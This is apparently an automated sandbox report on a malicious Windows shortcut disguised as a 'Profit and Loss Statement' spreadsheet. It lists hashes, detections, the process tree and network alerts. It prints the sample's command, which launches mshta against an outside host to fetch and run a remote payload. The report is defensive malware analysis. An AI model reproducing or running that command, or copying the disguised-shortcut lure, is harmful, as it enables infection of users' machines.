Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 14, 2021, 4:33 p.m.	Sept. 14, 2021, 4:35 p.m.

Size	22.3KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=24, Archive, ctime=Sun Feb 16 21:46:36 2020, mtime=Mon Sep 28 16:46:47 2020, atime=Sun Feb 16 21:46:36 2020, length=280064, window=hide
MD5	`1b025ec7e56c329c94a05c819a9dfaff`
SHA256	`825c84154c85b2f8213aaa7902f015c4478ddcd3172c48542688be2675d6e305`
CRC32	`7F016BFB`
ssdeep	`192:8xT4MFv6gaO2Wa7Hs+KmIUBfIJL2V++lNQO7BWIrM0KJY0EmTTpGUyeaimCKminr:ItyganskgAc+HNtlupBy2KIQsau802`
Yara	Generic_Malware_Zero - Generic Malware Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "TjZTk" "C:\Users\test22\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk"
2524
- cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.bloomcloud.org/Yt3f4GLL1WXn/cldQqmNYKwflyCJavhZIvktwMcZyHo=
  2628
  - mshta.exe C:\Windows\System32\mshta https://share.bloomcloud.org/Yt3f4GLL1WXn/cldQqmNYKwflyCJavhZIvktwMcZyHo=
    2208

Name	Response	Post-Analysis Lookup
share.bloomcloud.org	A 139.180.164.131	139.180.164.131

IP Address	Status	Action
139.180.164.131	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49171 -> 139.180.164.131:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49171 139.180.164.131:443	C=US, O=Let's Encrypt, CN=R3	CN=bloomcloud.org	14:f1:38:d4:67:70:b8:bf:b6:b6:da:8a:3c:69:38:e2:92:24:20:1c

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2021, 4:33 p.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET https://share.bloomcloud.org/Yt3f4GLL1WXn/cldQqmNYKwflyCJavhZIvktwMcZyHo=

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.bloomcloud.org/Yt3f4GLL1WXn/cldQqmNYKwflyCJavhZIvktwMcZyHo=
cmdline	C:\Windows\System32\mshta https://share.bloomcloud.org/Yt3f4GLL1WXn/cldQqmNYKwflyCJavhZIvktwMcZyHo=

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 14, 2021, 4:33 p.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://share.bloomcloud.org/Yt3f4GLL1WXn/cldQqmNYKwflyCJavhZIvktwMcZyHo=

Yara rule detected in process memory (39 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Sept. 14, 2021, 4:33 p.m.	key_handle: 0x000002cc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2524 resumed a thread in remote process 2628
Process injection	Process 2628 resumed a thread in remote process 2208
NtResumeThread Sept. 14, 2021, 4:33 p.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2628	1	0	0
NtResumeThread Sept. 14, 2021, 4:33 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2208	1	0	0

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Lionic	Trojan.WinLNK.Nioc.4!c
CAT-QuickHeal	LNK.Agent.41324
ALYac	Heur.BZC.YAX.Nioc.1.078B6D01
Arcabit	Heur.BZC.YAX.Nioc.1.078B6D01
ESET-NOD32	LNK/Agent.GX
BitDefender	Heur.BZC.YAX.Nioc.1.078B6D01
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.078B6D01
Tencent	Heur:Trojan.Winlnk.Downloader.wya
Ad-Aware	Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft	Heur.BZC.YAX.Nioc.1.078B6D01 (B)
TrendMicro	TROJ_FRS.VSNW0DI21
FireEye	Heur.BZC.YAX.Nioc.1.078B6D01
Sophos	Troj/DownLnk-X
Ikarus	Win32.Outbreak
MAX	malware (ai score=98)
GData	Heur.BZC.YAX.Nioc.1.078B6D01
AhnLab-V3	LNK/Autorun.Gen
VBA32	suspected of Trojan.Link.URL
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
SentinelOne	Static AI - Malicious LNK

Profit and Loss Statement.xlsx.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All